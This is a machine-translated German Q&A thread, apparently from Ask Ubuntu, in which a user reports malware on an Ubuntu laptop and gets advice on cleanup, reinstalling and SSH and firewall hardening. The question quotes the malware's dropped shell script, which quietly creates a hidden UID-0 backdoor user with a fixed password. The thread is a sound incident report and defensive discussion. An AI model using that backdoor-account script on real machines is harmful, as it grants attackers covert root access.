Wie gehe ich mit Malware auf meinem Laptop um?


12

Ich bin mir ziemlich sicher, dass mein Ubuntu 13.10-Laptop mit einer Art Malware infiziert ist.

Hin und wieder stelle ich fest, dass ein Prozess / lib / sshd (im Besitz von root) ausgeführt wird und viel CPU verbraucht. Es ist nicht der sshd-Server, auf dem / usr / sbin / sshd ausgeführt wird.

Die Binärdatei verfügt über die Berechtigungen --wxrw-rwt und generiert und erzeugt Skripte im Verzeichnis / lib. Eine aktuelle Version heißt 13959730401387633604 und führt die folgenden Aktionen aus

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Der Benutzer gusr wurde von der Malware unabhängig erstellt, und dann hängt sich der chpasswd auf, während 100% der CPU verbraucht werden.

Bisher habe ich festgestellt, dass der Benutzer gusr zusätzlich zu den Dateien in / etc / hinzugefügt wurde.

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Es scheint, als hätte die Malware Kopien all dieser Dateien mit dem Suffix "-" erstellt. Die vollständige Liste der von root geänderten / etc / -Dateien finden Sie hier .

Außerdem wurde die Datei / etc / hosts in this geändert .

Die Datei / lib / sshd fügt sich am Ende der Datei /etc/init.d/rc.local hinzu!

Ich habe den Benutzer entfernt, die Dateien entfernt, den verarbeiteten Baum gelöscht, meine Passwörter geändert und die öffentlichen ssh-Schlüssel entfernt.

Mir ist bewusst, dass ich im Grunde genommen geschraubt bin, und ich werde höchstwahrscheinlich das gesamte System neu installieren. Da ich mich jedoch bei mehreren anderen Computern anmelde, wäre es gut, zumindest zu versuchen, es zu entfernen und herauszufinden, wie ich es bekommen habe. Vorschläge, wie dies zu bewerkstelligen ist, sind willkommen.

Es scheint, als wären sie am 25. März durch brachiales Root-Login reingekommen. Ich hatte keine Ahnung, dass root ssh in Ubuntu standardmäßig aktiviert ist. Ich habe es deaktiviert und Denyhosts aufgestellt.

Der Login war von 59.188.247.236, anscheinend irgendwo in Hong Kong.

Ich habe den Laptop von EmperorLinux bekommen und sie haben den Root-Zugriff aktiviert. Wenn Sie eine davon haben und sshd ausführen, passen Sie auf.


2
Holen Sie sich Ihre Maschine aus dem Netzwerk! Jetzt!
Seth

2
Und warum haben Sie root-Login aktiviert? Das sollten Sie nicht ohne Grund aktivieren.
Seth

@Seth Ich habe es nicht aktiviert, es war standardmäßig in Ubuntu aktiviert . Ich bin so überrascht wie du.
Dejan Jovanović

1
Siehe " Standardmäßig wird der SSH-Dämon mit aktivierten Remote-Root-Anmeldungen ausgeliefert. Normalerweise erlaubt Ubuntu keinen direkten Zugriff auf den Root-Benutzer, daher ist diese Einstellung unwichtig. Wenn Sie ein Passwort für das Root-Konto festgelegt haben, kann diese Einstellung eine potenzielle sein Sicherheitsrisiko und sollte deaktiviert werden. "
Seth

1
Ich bin mir ziemlich sicher, dass dies nicht der Fall ist Linux/Ebury. Es ist etwas anderes und hat möglicherweise keinen zugewiesenen Namen. Ebury würde kein neues Benutzerkonto erstellen und hätte die von openssh verwendete gemeinsam genutzte Bibliothek geändert und nicht in einer neuen Binärdatei mit dem Namen sshd abgelegt.
Riking

Antworten:


11

Holen Sie sich zuerst die Maschine jetzt aus dem Netzwerk!

Zweitens, warum haben Sie das Root-Konto aktiviert? Sie sollten das Root-Konto nur aktivieren, wenn Sie einen guten Grund dafür haben.

Drittens ist eine Neuinstallation der einzige Weg, um sicherzugehen, dass Sie sauber sind. Es wird auch empfohlen, dass Sie neu beginnen und nicht auf ein Backup zurückgreifen, da Sie nie sicher sein können, wann alles begonnen hat.

Ich schlage außerdem vor, dass Sie bei Ihrer nächsten Installation eine Firewall einrichten und alle eingehenden Verbindungen ablehnen:

sudo ufw default deny incoming

und dann erlaube ssh mit:

sudo ufw allow ssh

und NICHT das Root-Konto aktivieren! Stellen Sie sicher, dass das Root-SSH-Login deaktiviert ist.


4
Ich habe das Root-Konto überprüft. Ich habe den Laptop von Emperorlinux bekommen und sie haben es dem Konto ermöglicht, ihn einzurichten. Blöd.
Dejan Jovanović

1
@ DejanJovanović Das ist schrecklich!
Seth
Durch die Nutzung unserer Website bestätigen Sie, dass Sie unsere Cookie-Richtlinie und Datenschutzrichtlinie gelesen und verstanden haben.
Licensed under cc by-sa 3.0 with attribution required.